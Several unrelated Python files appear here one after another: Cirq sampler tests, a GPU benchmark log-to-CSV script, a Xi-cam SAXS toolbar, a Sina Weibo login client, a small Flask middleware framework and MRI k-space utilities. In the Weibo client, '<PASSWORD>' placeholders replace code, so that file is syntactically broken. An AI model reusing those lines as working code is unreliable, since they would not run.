q = cirq.GridQubit(2, 2)
circuit = cirq.Circuit(cirq.X(q) ** sympy.Symbol('t'), cirq.measure(q, key='m'))
with pytest.raises(ValueError, match='Qubit not on device'):
results = sampler.run_sweep(circuit, sweep, repetitions=100)
def _batch_size_less_than_two(
circuits: List[cirq.Circuit], sweeps: List[cirq.Sweepable], repetitions: int
):
if len(circuits) > 2:
raise ValueError('Too many batches')
def test_batch_validation():
sampler = cg.ValidatingSampler(
device=cirq.UNCONSTRAINED_DEVICE,
validator=_batch_size_less_than_two,
sampler=cirq.Simulator(),
)
q = cirq.GridQubit(2, 2)
circuits = [
cirq.Circuit(cirq.X(q) ** sympy.Symbol('t'), cirq.measure(q, key='m')),
cirq.Circuit(cirq.X(q) ** sympy.Symbol('x'), cirq.measure(q, key='m2')),
]
sweeps = [cirq.Points(key='t', points=[1, 0]), cirq.Points(key='x', points=[0, 1])]
results = sampler.run_batch(circuits, sweeps, repetitions=100)
assert np.all(results[0][0].measurements['m'] == 1)
assert np.all(results[0][1].measurements['m'] == 0)
assert np.all(results[1][0].measurements['m2'] == 0)
assert np.all(results[1][1].measurements['m2'] == 1)
circuits = [
cirq.Circuit(cirq.X(q) ** sympy.Symbol('t'), cirq.measure(q, key='m')),
cirq.Circuit(cirq.X(q) ** sympy.Symbol('x'), cirq.measure(q, key='m2')),
cirq.Circuit(cirq.measure(q, key='m3')),
]
sweeps = [cirq.Points(key='t', points=[1, 0]), cirq.Points(key='x', points=[0, 1]), {}]
with pytest.raises(ValueError, match='Too many batches'):
results = sampler.run_batch(circuits, sweeps, repetitions=100)
def _too_many_reps(circuits: List[cirq.Circuit], sweeps: List[cirq.Sweepable], repetitions: int):
if repetitions > 10000:
raise ValueError('Too many repetitions')
def test_sweeps_validation():
sampler = cg.ValidatingSampler(
device=cirq.UNCONSTRAINED_DEVICE,
validator=_too_many_reps,
sampler=cirq.Simulator(),
)
q = cirq.GridQubit(2, 2)
circuit = cirq.Circuit(cirq.X(q) ** sympy.Symbol('t'), cirq.measure(q, key='m'))
sweeps = [cirq.Points(key='t', points=[1, 0]), cirq.Points(key='x', points=[0, 1])]
with pytest.raises(ValueError, match='Too many repetitions'):
_ = sampler.run_sweep(circuit, sweeps, repetitions=20000)
def test_batch_default_sweeps():
sampler = cg.ValidatingSampler()
q = cirq.GridQubit(2, 2)
circuits = [
cirq.Circuit(cirq.X(q), cirq.measure(q, key='m')),
cirq.Circuit(cirq.measure(q, key='m2')),
]
results = sampler.run_batch(circuits, None, repetitions=100)
assert np.all(results[0][0].measurements['m'] == 1)
assert np.all(results[1][0].measurements['m2'] == 0)
|
<filename>tools/log2csv.py
import os
import re
import glob
import argparse
import pandas as pd
list_test = ["alexnet", "inception3", "inception4", "resnet152", "resnet50", "vgg16"]
# Naming convention
# Key: log name
# Value: ([num_gpus], [names])
# num_gpus: Since each log folder has all the record for different numbers of GPUs, it is convenient to specify the benchmarks you want to pull by listing the num_gpus
# names: rename the experiments so they are easier to undertand
list_system = {
"7742-A100-SXM4-40GB": (
[1, 2, 4, 8],
[
"NorthernData A100 40GB SXM4",
"NorthernData 2x A100 40GB SXM4",
"NorthernData 4x A100 40GB SXM4",
"NorthernData 8x A100 40GB SXM4",
],
),
"7402P-Radeon_Instinct_MI50_16GB": (
[1, 2, 4, 8],
[
"NorthernData — Mi 50",
"NorthernData — 2x Mi 50",
"NorthernData — 4x Mi 50",
"NorthernData — 8x Mi 50",
],
),
}
def get_result(path_logs, folder, model):
folder_path = glob.glob(path_logs + "/" + folder + "/" + model + "*")[0]
folder_name = folder_path.split("/")[-1]
batch_size = folder_name.split("-")[-1]
file_throughput = folder_path + "/throughput/1"
with open(file_throughput, "r") as f:
lines = f.read().splitlines()
line = lines[-2]
throughput = line.split(" ")[-1]
try:
throughput = int(round(float(throughput)))
except:
throughput = 0
return batch_size, throughput
def create_row_throughput(
path_logs, mode, data, precision, key, num_gpu, name, df, is_train=True
):
if is_train:
if precision == "fp32":
folder_fp32 = (
key + ".logs/" + data + "-" + mode + "-fp32-" + str(num_gpu) + "gpus"
)
else:
folder_fp16 = (
key + ".logs/" + data + "-" + mode + "-fp16-" + str(num_gpu) + "gpus"
)
else:
if precision == "fp32":
folder_fp32 = (
key
+ ".logs/"
+ data
+ "-"
+ mode
+ "-fp32-"
+ str(num_gpu)
+ "gpus"
+ "-inference"
)
else:
folder_fp16 = (
key
+ ".logs/"
+ data
+ "-"
+ mode
+ "-fp16-"
+ str(num_gpu)
+ "gpus"
+ "-inference"
)
for model in list_test:
if precision == "fp32":
batch_size, throughput = get_result(path_logs, folder_fp32, model)
else:
batch_size, throughput = get_result(path_logs, folder_fp16, model)
df.at[name, model] = throughput
df.at[name, "num_gpu"] = num_gpu
def create_row_batch_size(
path_logs, mode, data, precision, key, num_gpu, name, df, is_train=True
):
if is_train:
if precision == "fp32":
folder_fp32 = (
key + ".logs/" + data + "-" + mode + "-fp32-" + str(num_gpu) + "gpus"
)
else:
folder_fp16 = (
key + ".logs/" + data + "-" + mode + "-fp16-" + str(num_gpu) + "gpus"
)
else:
if precision == "fp32":
folder_fp32 = (
key
+ ".logs/"
+ data
+ "-"
+ mode
+ "-fp32-"
+ str(num_gpu)
+ "gpus"
+ "-inference"
)
else:
folder_fp16 = (
key
+ ".logs/"
+ data
+ "-"
+ mode
+ "-fp16-"
+ str(num_gpu)
+ "gpus"
+ "-inference"
)
for model in list_test:
if precision == "fp32":
batch_size, throughput = get_result(path_logs, folder_fp32, model)
else:
batch_size, throughput = get_result(path_logs, folder_fp16, model)
df.at[name, model] = int(batch_size) * num_gpu
df.at[name, "num_gpu"] = num_gpu
def main():
parser = argparse.ArgumentParser(description="Gather benchmark results.")
parser.add_argument(
"--path", type=str, default="logs", help="path that has the logs"
)
parser.add_argument(
"--mode",
type=str,
default="replicated",
choices=["replicated", "parameter_server"],
help="Method for parameter update",
)
parser.add_argument(
"--data",
type=str,
default="syn",
choices=["syn", "real"],
help="Choose between synthetic data and real data",
)
parser.add_argument(
"--precision",
type=str,
default="fp32",
choices=["fp32", "fp16"],
help="Choose becnhmark precision",
)
args = parser.parse_args()
columns = []
columns.append("num_gpu")
for model in list_test:
columns.append(model)
list_row = []
for key, value in sorted(list_system.items()):
for name in value[1]:
list_row.append(name)
# Train Throughput
df_throughput = pd.DataFrame(index=list_row, columns=columns)
for key in list_system:
# list_gpus = list_system[key][0]
for (num_gpu, name) in zip(list_system[key][0], list_system[key][1]):
create_row_throughput(
args.path,
args.mode,
args.data,
args.precision,
key,
num_gpu,
name,
df_throughput,
)
df_throughput.index.name = "name_gpu"
df_throughput.to_csv("tf-train-throughput-" + args.precision + ".csv")
# # Inference Throughput
# df_throughput = pd.DataFrame(index=list_row, columns=columns)
# for key in list_system:
# list_gpus = list_system[key]
# for num_gpu in list_gpus:
# create_row_throughput(args.path, args.mode, key, num_gpu, df_throughput, False)
# df_throughput.index.name = 'name_gpu'
# df_throughput.to_csv('tf-inference-throughput-' + precision + '.csv')
# Train Batch Size
df_bs = pd.DataFrame(index=list_row, columns=columns)
for key in list_system:
for (num_gpu, name) in zip(list_system[key][0], list_system[key][1]):
create_row_batch_size(
args.path,
args.mode,
args.data,
args.precision,
key,
num_gpu,
name,
df_bs,
)
df_bs.index.name = "name_gpu"
df_bs.to_csv("tf-train-bs-" + args.precision + ".csv")
if __name__ == "__main__":
main()
|
<reponame>ihumphrey/Xi-cam.SAXS
from typing import Callable, Union
from qtpy.QtWidgets import *
from qtpy.QtCore import *
from qtpy.QtGui import *
from xicam.plugins.widgetplugin import QWidgetPlugin
from xicam.gui.static import path
from xicam.core.execution.workflow import Workflow
from xicam.plugins import OperationPlugin
from xicam.gui.widgets.menuview import MenuView
from xicam.gui.widgets.ROI import ArcROI, LineROI, BetterPolyLineROI, BetterRectROI, SegmentedRectROI
from xicam.core import msg
from functools import partial
import pyqtgraph as pg
class SAXSToolbarBase(QToolBar):
name = 'SAXSToolbar'
sigPlotCache = Signal()
sigDoWorkflow = Signal()
sigDeviceChanged = Signal(str)
def __init__(self, *args, **kwargs):
super(SAXSToolbarBase, self).__init__(*args)
def mkAction(self, iconpath: str = None, text=None, receiver=None, group=None, checkable=False, checked=False):
actn = QAction(self)
if iconpath: actn.setIcon(QIcon(QPixmap(str(path(iconpath)))))
if text: actn.setText(text)
if receiver: actn.triggered.connect(receiver)
actn.setCheckable(checkable)
if checked: actn.setChecked(checked)
if group: actn.setActionGroup(group)
return actn
class FieldSelector(SAXSToolbarBase):
def __init__(self, headermodel: QStandardItemModel, selectionmodel: QItemSelectionModel, *args, **kwargs):
self.headermodel = headermodel
self.selectionmodel = selectionmodel
self.headermodel.dataChanged.connect(self.updatedetectorcombobox)
super(FieldSelector, self).__init__()
self.addWidget(QLabel("Detector: "))
self.detectorcombobox = QComboBox()
self.detectorcombobox.setSizeAdjustPolicy(QComboBox.AdjustToContents)
self.addWidget(self.detectorcombobox)
self.addSeparator()
self.detectorcombobox.currentTextChanged.connect(self.sigDeviceChanged)
def updatedetectorcombobox(self, start, end):
if self.headermodel.rowCount():
# TODO-- remove hard-coding of stream
stream = "primary"
item = self.headermodel.item(self.selectionmodel.currentIndex().row())
# fields = getattr(item.data(Qt.UserRole), stream).to_dask().keys()
catalog = item.data(Qt.UserRole) # type: Catalog
fields = [ technique["data_mapping"]["data_image"][1] for technique in catalog.metadata["techniques"] if technique["technique"] == "scattering" ]
self.detectorcombobox.clear()
self.detectorcombobox.addItems(fields)
class ModeSelector(SAXSToolbarBase):
def __init__(self, *args, **kwargs):
super(ModeSelector, self).__init__(*args, **kwargs)
self.modegroup = QActionGroup(self)
self.rawaction = self.mkAction('icons/raw.png', 'Raw', checkable=True, group=self.modegroup, checked=True)
self.addAction(self.rawaction)
self.cakeaction = self.mkAction('icons/cake.png', 'Cake (q/chi plot)', checkable=True, group=self.modegroup)
self.addAction(self.cakeaction)
self.remeshaction = self.mkAction('icons/remesh.png', 'Wrap Ewald Sphere', checkable=True, group=self.modegroup)
self.addAction(self.remeshaction)
self.addSeparator()
# TODO maybe toolbar is not the best solution here, instead having the buttonbox in the compare stage
# class ResultsModeSelector(SAXSToolbarBase):
# def __init__(self, *args, **kwargs):
# super(ResultsModeSelector, self).__init__(*args, **kwargs)
# self.viewmodegroup = QActionGroup(self)
# self.tabmode = self.mkAction(iconpath='icons/tabs.png', text='Tab View', checkable=True, group=self.viewmodegroup, checked=True)
# self.addAction(self.tabmode)
# self.gridmode = self.mkAction(iconpath='icons/grid.png', text='Grid View', checkable=True, group=self.viewmodegroup)
# self.addAction(self.gridmode)
# self.addSeparator()
class MultiPlot(SAXSToolbarBase):
def __init__(self, *args, **kwargs):
super(MultiPlot, self).__init__(*args, **kwargs)
self.multiplot = QAction(self)
self.multiplot.setIcon(QIcon(str(path('icons/multiplot.png'))))
self.multiplot.setText('Plot Series')
self.multiplot.setCheckable(True)
self.multiplot.triggered.connect(self.sigDoWorkflow)
self.addAction(self.multiplot)
self.addSeparator()
class ROIs(SAXSToolbarBase):
def __init__(self, *args, view: Union[Callable, pg.ImageView] = None, workflow=None, index=-1, **kwargs):
super(ROIs, self).__init__(*args, **kwargs)
self.workflow = workflow
self.view = view
self.index = index # Where to insert the ROIs process into the workflow (default append)
self._scale_factor = .33
self.roi_button = QToolButton()
self.roi_button.setText("Create ROI")
self.roi_button.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
self.roi_button.setPopupMode(QToolButton.InstantPopup)
self.roi_menu = QMenu()
self.roi_button.setMenu(self.roi_menu)
# TODO -- disable button until we have loaded data
self.arc_roi = self.mkAction('icons/roi_arc.png', 'Arc ROI', self.add_arc)
self.roi_menu.addAction(self.arc_roi)
# self.horizontal_roi = self.mkAction('icons/roi_horizontal.png', 'Horizontal ROI', self.add_horizontal)
# self.roi_menu.addAction(self.horizontal_roi)
self.line_roi = self.mkAction('icons/roi_line.png', 'Line ROI', self.add_line)
self.roi_menu.addAction(self.line_roi)
self.polygon_roi = self.mkAction('icons/roi_polygon.png', 'Polygon ROI', self.add_polygon)
self.roi_menu.addAction(self.polygon_roi)
self.rect_segmented_roi = self.mkAction('icons/roi_rect_segmented.png', 'Segmented Rectangular ROI',
self.add_rect_segmented)
self.roi_menu.addAction(self.rect_segmented_roi)
self.rect_roi = self.mkAction('icons/roi_rect.png', 'Rectangular ROI', self.add_rect)
self.roi_menu.addAction(self.rect_roi)
# self.vertical_roi = self.mkAction('icons/roi_vertical.png', 'Vertical ROI', self.add_vertical)
# self.roi_menu.addAction(self.vertical_roi)
self.addWidget(self.roi_button)
self.addSeparator()
# TODO: scale roi's by inspecting self.view
def _get_view(self):
view = self.view
if callable(view):
view = view()
return view
def _scaled_size(self):
view = self._get_view()
if view:
image_bound = view.imageItem.boundingRect()
width = image_bound.width()
height = image_bound.height()
return width * self._scale_factor, height * self._scale_factor
return -1, -1
def _rect_origin(self):
view = self._get_view()
if view:
image_bound = view.imageItem.boundingRect()
width = image_bound.width()
height = image_bound.height()
origin_x = image_bound.x() + width / 2 - width / 2 * self._scale_factor
origin_y = image_bound.y() + height / 2 - height / 2 * self._scale_factor
return origin_x, origin_y
return -1, -1
def add_roi(self, roi):
view = self._get_view()
if view:
view.getView().addItem(roi)
self.workflow.insert_operation(self.index, roi.operation)
# Remove the roi process from the workflow when the roi is removed
# TODO -- should this be in BetterROI?
roi.sigRemoveRequested.connect(lambda roi: self.workflow.remove_operation(roi.operation))
else:
msg.notifyMessage("Please open an image before creating an ROI.", level=msg.WARNING)
def add_arc(self):
self.add_roi(ArcROI(center=(0, 0), radius=.25))
def add_horizontal(self):
...
def add_line(self):
image_bound = self.view().imageItem.boundingRect()
width = image_bound.width()
height = image_bound.height()
x = image_bound.x() + width / 2 + width / 2 * self._scale_factor
y = image_bound.y() + height / 2
self.add_roi(LineROI(pos1=(self._rect_origin()[0], y), pos2=(x, y), width=self._scaled_size()[0]))
def add_polygon(self):
rect = QRectF(QPointF(*self._rect_origin()), QSizeF(*self._scaled_size()))
points = [(point.x(), point.y()) for point in [rect.bottomLeft(),
rect.bottomRight(),
rect.topRight(),
rect.topLeft()]]
self.add_roi(BetterPolyLineROI(points, closed=True))
def add_rect(self):
self.add_roi(BetterRectROI(pos=self._rect_origin(), size=self._scaled_size()))
def add_rect_segmented(self):
self.add_roi(SegmentedRectROI(pos=self._rect_origin(), size=self._scaled_size()))
def add_vertical(self):
...
class SAXSToolbarRaw(FieldSelector):
pass
class SAXSToolbarMask(FieldSelector):
pass
class SAXSToolbarReduce(MultiPlot, ROIs, ModeSelector):
def __init__(self, *args, **kwargs):
super(SAXSToolbarReduce, self).__init__(*args, **kwargs)
# class SAXSToolbarCompare(ResultsModeSelector):
# pass
|
<filename>01 weibo/weibo.py<gh_stars>0
# -*- coding: utf-8 -*-
# @Author : Leo
import os
import rsa
import time
import base64
import requests
import binascii
from urllib.parse import quote
class LoginSinaWeibo:
"""
新浪微博登陆
- 用户名和密码均加密后提交,其中密码采用rsa加密
"""
# 创建session会话
session = requests.session()
def __init__(self, username, password):
self.username = username
self.password = password
# ssologin.js版本
self.ssologin_version = 'v1.4.18'
# 微博登陆首页地址
self.login_home_url = 'https://weibo.com/login.php'
# 预登陆参数获取接口
self.pre_login_params_url = 'https://login.sina.com.cn/sso/prelogin.php'
# 提交正式登陆数据的链接
self.real_login_url = 'https://login.sina.com.cn/sso/login.php?client=ssologin.js({js_version})&_={ts}'.format(
js_version=self.ssologin_version, ts=int(time.time()))
# 验证码图片地址
self.captcha_url = "http://login.sina.com.cn/cgi/pin.php?r={ts}&s=0&p={pcid}"
self.session.headers.update(
{"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"})
self._init_session()
# 设置是否登录成功标志
self.login_success = False
# 个人信息
self.user_info = None
def login(self):
"""开始登陆"""
login_status_info = {'code': 1, 'state': 'failed', 'message': ''}
login_form_data = self._pre_login()
login_resp = self.session.post(url=self.real_login_url, data=login_form_data)
login_resp_json = login_resp.json()
# 登录成功
if login_resp_json.get('retcode') == '0':
self.login_success = True
self.user_info = {'username': login_resp_json.get('uid'), 'nickname': login_resp_json.get('nick')}
login_status_info['code'] = 0
login_status_info['state'] = 'success'
login_status_info['message'] = '登录成功,获取到的用户名: %s' % login_resp_json.get('nick')
# 验证码不正确
elif login_resp_json.get('retcode') == '2070':
login_status_info['message'] = '登录失败,%s' % login_resp_json.get('reason')
elif login_resp_json.get('retcode') == '101':
login_status_info['message'] = '登录失败,%s' % login_resp_json.get('reason')
else:
login_status_info['message'] = '登录失败,登录返回结果 %s' % login_resp.text
return login_status_info
def get_user_info(self):
"""获取用户信息
:return: 登录成功`rtype:dict`, 登录失败`rtype:None`
"""
return self.user_info if self.login_success else None
def get_login_cookies(self) -> dict:
"""获取用户登录后的cookies"""
return requests.utils.dict_from_cookiejar(self.session.cookies)
def _init_session(self):
"""初始化请求会话"""
try:
self.session.get(url=self.login_home_url)
except requests.exceptions.RequestException:
pass
def _pre_login(self):
"""预登陆操作,获取相关参数"""
# 获取提交的用户名
s_username = self._get_su()
# 获取提交登陆时需要的参数
json_data = self._get_login_form_data(su=s_username)
# # 获取提交的密码字符串
# s_password = self._get_s_password(json_data=json_data)
s_password = self._get_s_password(server_time=json_data.get('servertime'),
nonce=json_data.get('nonce'),
pubkey=json_data.get('pubkey'))
# 设置提交登陆操作时
login_form_data = {
'entry': 'weibo',
'gateway': '1',
'from': '',
'savestate': '7',
'userticket': '1',
'vsnf': '1',
'service': 'miniblog',
'encoding': 'UTF-8',
'pwencode': 'rsa2',
'sr': '1280*800',
'prelt': '529',
'url': 'http://weibo.com/ajaxlogin.php?framelogin=1&callback=parent.sinaSSOController.feedBackUrlCallBack',
'rsakv': json_data.get('rsakv'),
'servertime': json_data.get('servertime'),
'nonce': json_data.get('nonce'),
'su': s_username,
'sp': s_password,
'returntype': 'TEXT'
}
# print(json.dumps(login_form_data, ensure_ascii=False))
# 需要验证码时
if json_data.get('pcid'):
current_captcha_url = self.captcha_url.format(ts=int(time.time()), pcid=json_data.get('pcid'))
captcha_resp = self.session.get(url=current_captcha_url)
temp_captcha_file = 'weibo_captcha.jpg'
open(temp_captcha_file, 'wb').write(captcha_resp.content)
# TODO 2019-06-24 开放验证码识别接口 http://captcha.faceme.site/sina
# 使用方式见README-IDEAs.md文档
captcha_text = input('验证码保存路径为 %s\n验证码的值为> ' % os.path.abspath(temp_captcha_file))
login_form_data['pcid'] = json_data.get('pcid')
login_form_data['door'] = captcha_text
return login_form_data
def _get_su(self):
"""获取真实的执行登陆操作时提交的用户名"""
# 用户名先进行url编码
username_quote = quote(self.username)
# 再经过base64进行编码
username_base64 = base64.b64encode(username_quote.encode('utf-8'))
return username_base64.decode('utf-8')
def _get_s_password(self, server_time, nonce, pubkey):
"""获取将密码加密后用于登录的字符串"""
encode_password = (str(server_time) + "\t" + str(nonce) + "\n" + str(self.password)).encode("utf-8")
public_key = rsa.PublicKey(int(pubkey, 16), int('10001', 16))
encry_password = rsa.encrypt(encode_password, public_key)
password = <PASSWORD>(encry_password)
return password.decode()
def _get_login_form_data(self, su):
"""获取登陆form-data提交的参数`servertime`,`nonce`,`pubkey`,`rsakv`,`showpin`,etc"""
pre_login_params = {
'entry': 'weibo',
'rsakt': 'mod',
'checkpin': '1',
'client': 'ssologin.js({js_version})'.format(js_version=self.ssologin_version),
'su': su,
'_': int(time.time() * 1000)}
try:
resp = self.session.get(url=self.pre_login_params_url, params=pre_login_params)
if resp.status_code == 200 and resp.json().get('retcode') == 0:
json_data = resp.json()
return json_data
else:
raise ValueError('请求获取的数据无效')
except (requests.exceptions.RequestException, ValueError):
raise Exception('获取form-data参数出错')
if __name__ == '__main__':
test_username = 'your username'
test_password = '<PASSWORD>'
loginer = LoginSinaWeibo(username=test_username, password=<PASSWORD>password)
# 开始执行登录操作
login_result = loginer.login()
print('登录结果:', login_result)
# 获取用户信息
user_info = loginer.get_user_info()
print('用户信息:', user_info)
# 获取登录状态cookies
cookies = loginer.get_login_cookies()
print('登录Cookies:', cookies)
|
# coding=utf-8
import json
from enum import Enum
from typing import Callable, Any
from flask import Flask, request as flask_request
MiddlewareType = Enum('MiddlewareType', ('Request', 'Response'))
class Middleware:
func = Callable
tag = str
weight = int
type = MiddlewareType
def __init__(
self,
func: Callable,
tag: str = None,
weight: int = 0,
m_type: MiddlewareType = MiddlewareType.Request
):
self.func = func
self.tag = tag
self.weight = weight
self.type = m_type
class Module:
name = str
__registered_function = bool
__middleware = dict
__function = dict
def __init__(self, name: str):
self.name = name
self.__middleware = {
'': list()
}
self.__function = dict()
self.__registered_function = False
def register_middleware(self, middleware: Middleware) -> None:
if self.__registered_function:
raise Exception('Can\'t register middleware after called function')
if middleware.tag is None:
self.__middleware[''].append(middleware)
else:
if middleware.tag not in self.__middleware.keys():
self.__middleware[middleware.tag] = list()
self.__middleware[middleware.tag].append(middleware)
def request(self, request):
if request.function not in self.__function.keys():
raise Exception('function not found')
all_middleware = list()
for middleware in self.__middleware['']:
all_middleware.append(middleware)
req_func = self.__function[request.function]
if req_func.tags is not None:
for tag in req_func.tags:
for middleware in self.__middleware[tag]:
all_middleware.append(middleware)
all_middleware.sort(key=lambda mid: mid.weight, reverse=True)
for middleware in all_middleware:
if middleware.type != MiddlewareType.Request:
continue
new_request = middleware.func(request)
if new_request is not None:
request = new_request
request.response = req_func.f(**request.args)
for middleware in all_middleware:
if middleware.type != MiddlewareType.Response:
continue
new_response = middleware.func(request.response)
if new_response is not None:
request.response = new_response
def function(self, name: str, tags: list = None):
def decorator(f):
self.__registered_function = True
self.__function[name] = _ModuleFunction(f=f, tags=tags)
return f
return decorator
class _ModuleFunction:
f = Callable
tags = list
def __init__(self, f: Callable, tags: list = None):
self.f = f
self.tags = tags
class Error(BaseException):
code = int
message = str
def __init__(self, code: int = 0, msg: str = ''):
self.code = code
self.message = msg
class Response:
data = dict
error = Error
def __init__(self, data: (dict, list) = None, error: Error = None) -> None:
if data is None:
self.data = dict()
else:
self.data = data
if error is None:
self.error = Error()
else:
self.error = error
@property
def response(self) -> str:
return json.dumps(dict(data=self.data, error=self.error), cls=ResponseEncoder)
class Request:
module = Module
function = str
args = dict
response = Response
def __init__(self, req: dict):
if 'module' not in req.keys() or 'function' not in req.keys() or 'args' not in req.keys():
raise Exception('wrong request arguments')
self.module = App.get_instance().get_module(req['module'])
self.function = req['function']
self.args = req['args']
self.module.request(self)
class ResponseEncoder(json.JSONEncoder):
def default(self, o: Any) -> Any:
if isinstance(o, Error):
return dict(code=o.code, msg=o.message)
return json.JSONEncoder.default(self, o)
class App(Flask):
__instance = None
__modules = dict
def __init__(self, name: str = 'lazy_flask', endpoint: str = '/query'):
super().__init__(name)
self.__modules = dict()
self.__instance.add_url_rule(endpoint, None, App.query, methods=['POST'])
def __new__(cls, *args, **kwargs):
if not cls.__instance:
cls.__instance = super().__new__(cls, *args, **kwargs)
return cls.__instance
def register_module(self, module: Module) -> None:
self.__modules[module.name] = module
def get_module(self, name: str) -> Module:
if name not in self.__modules.keys():
raise Exception('{} not in modules'.format(name))
return self.__modules[name]
@staticmethod
def query():
try:
req = Request(flask_request.json)
return req.response.response
except Error as e:
return Response(error=e).response
@staticmethod
def get_instance():
return App.__instance
|
<reponame>mikgroup/subtle_data_crimes
import numpy as np
from PIL import Image
import os
def calc_pad_half(N_original, pad_ratio):
N_tot = N_original * pad_ratio # this will be the total k-space size
diff = np.ceil(N_tot - N_original) # this is the total padding length
pad_size_vec = diff.astype(int) # convert from float to int
pad_half_vec = (pad_size_vec / 2).astype(
int) # kspace will be padded with "pad_half" from each size, so the total padding length is padd_size
return pad_half_vec, N_tot
def pad_multicoil_ksp(ksp_slice, pad_ratio):
''' This function applies zero-padding to multi-coil k-space data of a single slice.
The zero-padding is applied to each coil separately. The pad_ratio determines the zero padding
factor, i.e. if the initial ksp size is NxN, after padding it will be of size (N*pad_ratio)x(N*pad_ratio)
Inputs:
ksp_slice - dimensions (N_coils, NX, NY),
pad_ratio - a scalar
Output:
ksp_slice_padded - dimensions (Ncoils, NX*pad_ratio, NY*pad_ratio)
'''
N_original_dim1 = ksp_slice.shape[1]
N_original_dim2 = ksp_slice.shape[2]
pad_half_dim1, N_tot_dim1 = calc_pad_half(N_original_dim1, pad_ratio)
pad_half_dim2, N_tot_dim2 = calc_pad_half(N_original_dim2, pad_ratio)
# zero-pad k-space - for every coil separately
padding_lengths = ((0, 0), (pad_half_dim1, pad_half_dim1), (pad_half_dim2, pad_half_dim2))
# padding_lengths_yz = ((pad_half_dim1, pad_half_dim1), (pad_half_dim2, pad_half_dim2))
ksp_slice_padded = np.pad(ksp_slice, padding_lengths, mode='constant', constant_values=(0, 0))
return ksp_slice_padded
def merge_multicoil_data(ksp_slice_all_coils):
# This function receives *complex* multi-coil data and merges it into a single *magtniude* image.
# The merging method: square Root Sum of Squares (RSS)
# Expected input dimensions: [Ncoils,Sx,Sy]
# Notice: the input should contain data of a *single slice*
ksp_slice_data = ksp_slice_all_coils[:, :, :].squeeze() # eliminate slice dimension
Nc, Sx, Sy = ksp_slice_data.shape
squares_data = np.empty([Nc, Sx, Sy])
# fig, ax = plt.subplots(nrows=1,ncols=4)
for n in range(Nc):
ksp_1coil = ksp_slice_data[n, :, :].squeeze() # kspace data of 1 coil
im_1coil_complex = np.fft.fftshift(np.fft.ifft2(ksp_1coil)) # complex image of 1 coil
im_square = np.abs(im_1coil_complex) ** 2
squares_data[n, :, :] = im_square
SOS = np.sum(squares_data, axis=0)
mag_im = np.sqrt(SOS)
return mag_im
def zpad_merge_scale(ksp_block_multicoil, pad_ratio):
''' This script takes in multi-coil k-space data, applies zero-padding with a factor equal to pad_ratio
(e.g. 2x, 3x), and then merges the multi-coil images into a single magnitude image.
inputs:
kspace - numpy array of size [Ncoils, NX, NY]
pad_ratio - numpy array (scalar) that denotes the desired padding ratio
'''
NX = ksp_block_multicoil.shape[1]
NY = ksp_block_multicoil.shape[2]
############## zero-pad, merge & save ###################
pad_half_dim1, N_tot_dim1 = calc_pad_half(NX, pad_ratio)
pad_half_dim2, N_tot_dim2 = calc_pad_half(NY, pad_ratio)
padding_lengths = ((0, 0), (pad_half_dim1, pad_half_dim1), (pad_half_dim2, pad_half_dim2))
# NX_padded = int(NX * pad_ratio)
# NY_padded = int(NY * pad_ratio)
ksp_block_multicoil_padded = np.pad(ksp_block_multicoil, padding_lengths, mode='constant',
constant_values=(0, 0))
# compute a single *magnitude* image from the data
im_mag = merge_multicoil_data(ksp_block_multicoil_padded)
# intensity normalization by the 98% percentile
magnitude_vals = im_mag.reshape(-1)
mag_vals_sorted = np.sort(magnitude_vals)
k = int(round(0.98 * magnitude_vals.shape[0]))
scale_factor = mag_vals_sorted[k]
im_mag_scaled = im_mag / scale_factor
return im_mag_scaled
# --------------------- JPEG compression ----------------------------
def JPEG_compression(im_mag, quality_val=100):
'''
inputs:
im_mag - a magnitude image
quality_val - a paramter that controls the JPEG compression quality:
quality_val=100 yields the mininal compression
quality_val=75 is JPEG's default
quality_val=5 (or close to 0) yields an extreme compression
'''
# normalize the range to [0,1]
im_mag = im_mag / np.max(im_mag)
# normalize the range to [0,255]
scale_factor = 255 # 255 / np.max(im_mag)
im_mag_scaled = im_mag * scale_factor
im_mag_uint8 = (im_mag_scaled).astype('uint8') # prepare for JPEG compression
im_PIL = Image.fromarray(im_mag_uint8) # apply lossy compression by saving in JPEG format
jpeg_figs_folder = "jpeg_imgs_q" + str(quality_val) + "/"
if not os.path.exists(jpeg_figs_folder):
os.makedirs(jpeg_figs_folder)
# compress the image by saving it in JPEG format
im_comp_filename = jpeg_figs_folder + 'im_compressed_q{}.jpg'.format(quality_val)
im_PIL.save(im_comp_filename, format='JPEG', quality=quality_val, subsampling=0)
# load the JPEG image
im_compressed = np.asarray(Image.open(im_comp_filename)) # convert from pillow format to numpy format
im_compressed = im_compressed / scale_factor
# print('max(im_compressed) after scaling:', np.max(np.abs(im_compressed)))
return im_compressed
# -------------------- calc_R_actual -------------------------------
def calc_R_actual(mask):
mask_1D = np.reshape(mask, (1, -1))
R_actual = mask_1D.shape[1] / np.count_nonzero(mask_1D)
return R_actual
# ------------ save as png image
def save_as_png(im_orig, filename):
rescaled = (255.0 / im_orig.max() * (im_orig - im_orig.min())).astype(np.uint8)
im = Image.fromarray(rescaled)
filename_str = filename + '.png'
im.save(filename_str)
# ------------------- extract block ---------------------------------
def extract_block(im, block_asp_ratio_x, block_asp_ratio_y, x_margin, y_margin):
NX = im.shape[0]
NY = im.shape[1]
NX_block = int(block_asp_ratio_x * NX)
NY_block = int(block_asp_ratio_y * NY)
x_max_offset = NX - NX_block - x_margin - 25
y_max_offset = NY - NY_block - y_margin - 25
assert x_max_offset > x_margin, 'x_max_offset<y_margin'
assert y_max_offset > y_margin, 'y_max_offset<y_margin'
valid_block_flag = 0
# Next we extract a block from the image and check that it contains some signal, i.e. that it's not empty.
# If the block is "empty" (i.e. contains mostly noise) we will try to extract another block. Max 50 trials.
# If after 50 trials the block is still not good we'll store it anyway.
trial_cnt = 0
while (valid_block_flag == 0) & (trial_cnt <= 50):
trial_cnt += 1
x_i = np.random.randint(x_margin, x_max_offset, size=1) # offset in x axis
y_i = np.random.randint(y_margin, y_max_offset, size=1) # offset in x axis
im_block = im[x_i[0]:(x_i[0] + NX_block), y_i[0]:(y_i[0] + NY_block)]
if np.max(np.abs(im_block)) > 0.5 * np.max(np.abs(im)):
# print('block is OK')
valid_block_flag = 1
else:
print('block contains mostly noise - not good - extract a different one')
return im_block |
#!/usr/bin/env python3
import socket
import argparse
import threading
import signal
import json
import requests
import sys
import time
import traceback
from queue import Queue
from contextlib import contextmanager
